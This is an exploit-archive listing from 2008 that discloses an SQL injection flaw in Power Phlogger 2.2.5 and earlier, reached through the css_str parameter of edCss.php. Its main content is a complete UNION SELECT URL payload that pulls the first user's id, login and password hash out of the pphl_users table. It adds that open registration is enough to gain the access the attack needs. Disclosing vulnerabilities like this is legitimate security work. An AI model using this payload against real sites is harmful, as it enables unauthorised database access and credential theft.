Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability
# Published : 2008-06-05
# Author : MustLive
# Previous Title : Joomla Component simpleshop <= 3.4 SQL injection Vulnerability
# Next Title : pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability

############################################################

SQL Injection vulnerability in Power Phlogger

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2158/

Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.
 
SQL Injection:
 
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
 
With this query you will receive id, login and password (hash) of first user.
 
Vulnerable versions are Power Phlogger <= 2.2.5.
 
############################################################

# www.Syue.com [2008-06-05]